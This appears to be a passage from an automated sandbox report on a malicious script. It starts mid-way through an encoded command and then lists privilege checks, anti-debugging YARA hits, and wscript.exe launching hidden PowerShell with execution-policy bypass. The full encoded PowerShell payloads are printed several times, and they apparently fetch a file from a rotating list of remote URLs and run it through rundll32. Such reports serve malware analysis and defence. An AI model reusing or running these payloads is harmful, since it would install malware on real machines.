QQBEAEEAQQBOAHcAQQA9AGQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFkAQQBaAFEAQgBzAEEARwA4AEEAZABRAEIAeQBBAEYAUQBBAGEAUQBCAG0AQQBHAFkAQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAdgBBAEEAPQA9ACIAOwAkAHQAdQByAHAAZQBuAHQAaQBuAGkAYwBBAG4AdABpAG0AbwBuAGEAcgBjAGgAYQBsACAAPQAgACIAQgByAGkAZABhAGwAZQByACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAcABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYANgA1ADIAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABnAEIAaABBAEgAUQBBAFoAZwBCADEAQQBHAHcAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAGEAUQBCAHoAQQBHAFUAQQBjAGcAQQB1AEEASABVAEEAYwBBAEIAbgBBAEcAawBBAGMAZwBCAGsAQQBIAE0AQQBRAGcAQgBoAEEARwBNAEEAYQB3AEIAcwBBAEcAawBBAGMAdwBCADAAQQBIAE0AQQBMAEEAQgBFAEEARwB3AEEAYgBBAEIAUwBBAEcAVQBBAFoAdwBCAHAAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBPAHcAQgBCAEEARwA0AEEAWgB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABpAG0AcABlAHIAZgBvAHIAYQB0AGUAZABSAGUAcABlAG4AdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAEUAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIAaABBAEcANABBAGQAUQBCAHMAQQBHAEUAQQBjAGcAQQB1AEEASABBAEEAYgB3AEIAcgBBAEcAVQBBAGMAZwBBAD0ATQBvAGUAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATgB3AEEAMABBAEMANABBAE0AUQBBAHkAQQBEAE0AQQBMAGcAQQB4AEEARABVAEEATQB3AEEAPQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGEAUQBCADAAQQBHAFUAQQBaAGcAQgBzAEEASABrAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAG4AQQBIAEkAQQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFkAUQBCAHcAQQBHAFUAQQBjAGcAQgBpAEEARwA4AEEAZQBRAEIAUQBBAEgASQBBAFoAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEASABRAEEAWQBRAEIAdQBBAEcAVQBBAGIAdwBCADEAQQBIAE0AQQBiAEEAQgA1AEEAQwA0AEEAWQB3AEIAcwBBAEcAOABBAGQAUQBCAGsAQQBBAD0APQAiADsAJABBAGQAcgBvAGkAdABlAHMAdAAgAD0AIAA0ADQAOwBiAHIAZQBhAGsAOwBBAG4AZwB1AGwAYQByADsAfQBBAG4AZwB1AGwAYQByADsAfQAgAGMAYQB0AGMAaAAgAHsAJABSAGUAdgBlAHIAdABlAHIAQgBhAG4AawBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABNAEEATABnAEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAwAEEARABFAEEATABnAEEAeQBBAEQARQBBAE4AdwBBAD0AIgA7ACQAUwB0AHUAZABmAGkAcwBoAGUAcwBDAGUAcgBpAGEAbABpAGEAIAA9ACAAIgBwAHIAZQBwAG8AbgBkAGUAcgBhAHQAZQAiADsAfQB9ACQAYwBoAG8AbgBkAHIAZQBjAHQAbwBtAHkAIAA9ACAANwA0ADgAOwBBAG4AZwB1AGwAYQByADsA" filepath: powershell	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 18, 2023, 9:25 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABmAGwAYQBtAGwAZQBzAHMAIAA9ACAANQA0ADkAOwAkAGcAYQBzAHQAZQByAG8AegBvAG8AaQBkAFYAaQBuAGQAaQBjAGEAdABvAHIAIAA9ACAAIgBBAG0AcAB1AHQAYQB0AGUAZABKAGUAZABjAG8AYwBrACIAOwAkAFQAZQBsAGUAcwBjAG8AcABpAGMAYQBsACAAPQAgACIAUAByAGUAbABhAHQAaQBjAGEAbABuAGUAcwBzAEMAYQBuAGMAZQBsACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABTAHQAcgBhAGkAdABzAG0AZQBuAFIAaABvAG0AYgBvAGgAZQBkAHIAYQBsACAAPQAgADIAMAA2ADsAJABNAG8AcwBrAGUAbgBlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQB2AEEARwAwAEEAYQBRAEIAUwBBAEMAOABBAFkAdwBCAHEAQQBHAGsAQQBUAEEAQgBRAEEASABBAEEAUwBRAEIAVQBBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATABnAEEANQBBAEQARQBBAEwAdwBCAFkAQQBHADQAQQBaAEEAQQB2AEEARgBjAEEAYgB3AEIAdgBBAEUATQBBAGEAZwBCADEAQQBIAG8AQQBTAFEAQgBDAEEARQBRAEEAdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARQA4AEEAVABnAEIAUABBAEUAcwBBAGUAUQBCAHQAQQBIAGcAQQBiAHcAQgB2AEEARwA0AEEAUgBnAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAGwAdQBnAGwAaQBrAGUAIABpAG4AIAAkAE0AbwBzAGsAZQBuAGUAZQByACAALQBzAHAAbABpAHQAIAAiAHUAIgApACAAewAkAEQAaQBzAHMAZQB2AGUAcgBzACAAPQAgADYANgAwADsAdAByAHkAIAB7ACQAVwBhAGIAcgBvAG4AVwBvAG8AaQBuAGcAIAA9ACAAIgBNAGkAcwBsAGkAdgBlAGQARABpAHAAbABvAGsAYQByAHkAbwBuACIAOwAkAG8AdQB0AHQAaABvAHUAZwBoAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgB5AEEARwA4AEEAYwB3AEIAegBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQQB1AEEASABBAEEAYQBBAEIANQBBAEgATQBBAGEAUQBCAHYAQQBBAD0APQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AdwBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAawBBAEwAZwBBADUAQQBEAFUAQQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgATQBBAGQAQQBCAGwAQQBHADgAQQBjAEEAQgBzAEEARwBFAEEAYwB3AEIAMABBAEcAawBBAFoAUQBCAHoAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAbgB2AHIASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBhAEEAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgASQBBAEwAZwBCAGkAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAQwBoAG8AbgBkAHIAbwBjAGwAYQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBjAEEAQgB2AEEARwB3AEEAZQBRAEIAegBBAEcAVQBBAGMAdwBBAHUAQQBHAE0AQQBhAFEAQgAwAEEASABrAEEAIgA7ACQAUABpAG8AbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBsAHUAZwBsAGkAawBlACkAKQA7AGkAdwByACAAJABQAGkAbwBuAGUAZAAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHYAYQB0AGYAdQBsAFMAeQBzAHQAZQBtAGkAcwBlAHIALgB1AHAAZwBpAHIAZABzAEIAYQBjAGsAbABpAHMAdABzADsAJABmAGEAcwB0AHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE0AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE4AUQBBADAAQQBBAD0APQAiADsAJABuAG8AbgB2AGEAYwB1AG8AdQBzAG4AZQBzAHMAVAB1AGMAdQBuAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBOAFEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE8AQQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABnAEEAZAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBOAHcAQQA9AGQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFkAQQBaAFEAQgBzAEEARwA4AEEAZABRAEIAeQBBAEYAUQBBAGEAUQBCAG0AQQBHAFkAQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAdgBBAEEAPQA9ACIAOwAkAHQAdQByAHAAZQBuAHQAaQBuAGkAYwBBAG4AdABpAG0AbwBuAGEAcgBjAGgAYQBsACAAPQAgACIAQgByAGkAZABhAGwAZQByACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAcABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYANgA1ADIAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABnAEIAaABBAEgAUQBBAFoAZwBCADEAQQBHAHcAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAGEAUQBCAHoAQQBHAFUAQQBjAGcAQQB1AEEASABVAEEAYwBBAEIAbgBBAEcAawBBAGMAZwBCAGsAQQBIAE0AQQBRAGcAQgBoAEEARwBNAEEAYQB3AEIAcwBBAEcAawBBAGMAdwBCADAAQQBIAE0AQQBMAEEAQgBFAEEARwB3AEEAYgBBAEIAUwBBAEcAVQBBAFoAdwBCAHAAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBPAHcAQgBCAEEARwA0AEEAWgB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABpAG0AcABlAHIAZgBvAHIAYQB0AGUAZABSAGUAcABlAG4AdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAEUAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIAaABBAEcANABBAGQAUQBCAHMAQQBHAEUAQQBjAGcAQQB1AEEASABBAEEAYgB3AEIAcgBBAEcAVQBBAGMAZwBBAD0ATQBvAGUAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATgB3AEEAMABBAEMANABBAE0AUQBBAHkAQQBEAE0AQQBMAGcAQQB4AEEARABVAEEATQB3AEEAPQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGEAUQBCADAAQQBHAFUAQQBaAGcAQgBzAEEASABrAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAG4AQQBIAEkAQQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFkAUQBCAHcAQQBHAFUAQQBjAGcAQgBpAEEARwA4AEEAZQBRAEIAUQBBAEgASQBBAFoAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEASABRAEEAWQBRAEIAdQBBAEcAVQBBAGIAdwBCADEAQQBIAE0AQQBiAEEAQgA1AEEAQwA0AEEAWQB3AEIAcwBBAEcAOABBAGQAUQBCAGsAQQBBAD0APQAiADsAJABBAGQAcgBvAGkAdABlAHMAdAAgAD0AIAA0ADQAOwBiAHIAZQBhAGsAOwBBAG4AZwB1AGwAYQByADsAfQBBAG4AZwB1AGwAYQByADsAfQAgAGMAYQB0AGMAaAAgAHsAJABSAGUAdgBlAHIAdABlAHIAQgBhAG4AawBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABNAEEATABnAEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAwAEEARABFAEEATABnAEEAeQBBAEQARQBBAE4AdwBBAD0AIgA7ACQAUwB0AHUAZABmAGkAcwBoAGUAcwBDAGUAcgBpAGEAbABpAGEAIAA9ACAAIgBwAHIAZQBwAG8AbgBkAGUAcgBhAHQAZQAiADsAfQB9ACQAYwBoAG8AbgBkAHIAZQBjAHQAbwBtAHkAIAA9ACAANwA0ADgAOwBBAG4AZwB1AGwAYQByADsA"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABmAGwAYQBtAGwAZQBzAHMAIAA9ACAANQA0ADkAOwAkAGcAYQBzAHQAZQByAG8AegBvAG8AaQBkAFYAaQBuAGQAaQBjAGEAdABvAHIAIAA9ACAAIgBBAG0AcAB1AHQAYQB0AGUAZABKAGUAZABjAG8AYwBrACIAOwAkAFQAZQBsAGUAcwBjAG8AcABpAGMAYQBsACAAPQAgACIAUAByAGUAbABhAHQAaQBjAGEAbABuAGUAcwBzAEMAYQBuAGMAZQBsACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABTAHQAcgBhAGkAdABzAG0AZQBuAFIAaABvAG0AYgBvAGgAZQBkAHIAYQBsACAAPQAgADIAMAA2ADsAJABNAG8AcwBrAGUAbgBlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQB2AEEARwAwAEEAYQBRAEIAUwBBAEMAOABBAFkAdwBCAHEAQQBHAGsAQQBUAEEAQgBRAEEASABBAEEAUwBRAEIAVQBBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATABnAEEANQBBAEQARQBBAEwAdwBCAFkAQQBHADQAQQBaAEEAQQB2AEEARgBjAEEAYgB3AEIAdgBBAEUATQBBAGEAZwBCADEAQQBIAG8AQQBTAFEAQgBDAEEARQBRAEEAdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARQA4AEEAVABnAEIAUABBAEUAcwBBAGUAUQBCAHQAQQBIAGcAQQBiAHcAQgB2AEEARwA0AEEAUgBnAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAGwAdQBnAGwAaQBrAGUAIABpAG4AIAAkAE0AbwBzAGsAZQBuAGUAZQByACAALQBzAHAAbABpAHQAIAAiAHUAIgApACAAewAkAEQAaQBzAHMAZQB2AGUAcgBzACAAPQAgADYANgAwADsAdAByAHkAIAB7ACQAVwBhAGIAcgBvAG4AVwBvAG8AaQBuAGcAIAA9ACAAIgBNAGkAcwBsAGkAdgBlAGQARABpAHAAbABvAGsAYQByAHkAbwBuACIAOwAkAG8AdQB0AHQAaABvAHUAZwBoAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgB5AEEARwA4AEEAYwB3AEIAegBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQQB1AEEASABBAEEAYQBBAEIANQBBAEgATQBBAGEAUQBCAHYAQQBBAD0APQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AdwBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAawBBAEwAZwBBADUAQQBEAFUAQQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgATQBBAGQAQQBCAGwAQQBHADgAQQBjAEEAQgBzAEEARwBFAEEAYwB3AEIAMABBAEcAawBBAFoAUQBCAHoAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAbgB2AHIASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBhAEEAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgASQBBAEwAZwBCAGkAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAQwBoAG8AbgBkAHIAbwBjAGwAYQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBjAEEAQgB2AEEARwB3AEEAZQBRAEIAegBBAEcAVQBBAGMAdwBBAHUAQQBHAE0AQQBhAFEAQgAwAEEASABrAEEAIgA7ACQAUABpAG8AbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBsAHUAZwBsAGkAawBlACkAKQA7AGkAdwByACAAJABQAGkAbwBuAGUAZAAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHYAYQB0AGYAdQBsAFMAeQBzAHQAZQBtAGkAcwBlAHIALgB1AHAAZwBpAHIAZABzAEIAYQBjAGsAbABpAHMAdABzADsAJABmAGEAcwB0AHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE0AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE4AUQBBADAAQQBBAD0APQAiADsAJABuAG8AbgB2AGEAYwB1AG8AdQBzAG4AZQBzAHMAVAB1AGMAdQBuAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBOAFEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE8AQQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABnAEEAZAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBOAHcAQQA9AGQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFkAQQBaAFEAQgBzAEEARwA4AEEAZABRAEIAeQBBAEYAUQBBAGEAUQBCAG0AQQBHAFkAQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAdgBBAEEAPQA9ACIAOwAkAHQAdQByAHAAZQBuAHQAaQBuAGkAYwBBAG4AdABpAG0AbwBuAGEAcgBjAGgAYQBsACAAPQAgACIAQgByAGkAZABhAGwAZQByACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAcABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYANgA1ADIAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABnAEIAaABBAEgAUQBBAFoAZwBCADEAQQBHAHcAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAGEAUQBCAHoAQQBHAFUAQQBjAGcAQQB1AEEASABVAEEAYwBBAEIAbgBBAEcAawBBAGMAZwBCAGsAQQBIAE0AQQBRAGcAQgBoAEEARwBNAEEAYQB3AEIAcwBBAEcAawBBAGMAdwBCADAAQQBIAE0AQQBMAEEAQgBFAEEARwB3AEEAYgBBAEIAUwBBAEcAVQBBAFoAdwBCAHAAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBPAHcAQgBCAEEARwA0AEEAWgB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABpAG0AcABlAHIAZgBvAHIAYQB0AGUAZABSAGUAcABlAG4AdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAEUAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIAaABBAEcANABBAGQAUQBCAHMAQQBHAEUAQQBjAGcAQQB1AEEASABBAEEAYgB3AEIAcgBBAEcAVQBBAGMAZwBBAD0ATQBvAGUAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATgB3AEEAMABBAEMANABBAE0AUQBBAHkAQQBEAE0AQQBMAGcAQQB4AEEARABVAEEATQB3AEEAPQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGEAUQBCADAAQQBHAFUAQQBaAGcAQgBzAEEASABrAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAG4AQQBIAEkAQQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFkAUQBCAHcAQQBHAFUAQQBjAGcAQgBpAEEARwA4AEEAZQBRAEIAUQBBAEgASQBBAFoAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEASABRAEEAWQBRAEIAdQBBAEcAVQBBAGIAdwBCADEAQQBIAE0AQQBiAEEAQgA1AEEAQwA0AEEAWQB3AEIAcwBBAEcAOABBAGQAUQBCAGsAQQBBAD0APQAiADsAJABBAGQAcgBvAGkAdABlAHMAdAAgAD0AIAA0ADQAOwBiAHIAZQBhAGsAOwBBAG4AZwB1AGwAYQByADsAfQBBAG4AZwB1AGwAYQByADsAfQAgAGMAYQB0AGMAaAAgAHsAJABSAGUAdgBlAHIAdABlAHIAQgBhAG4AawBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABNAEEATABnAEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAwAEEARABFAEEATABnAEEAeQBBAEQARQBBAE4AdwBBAD0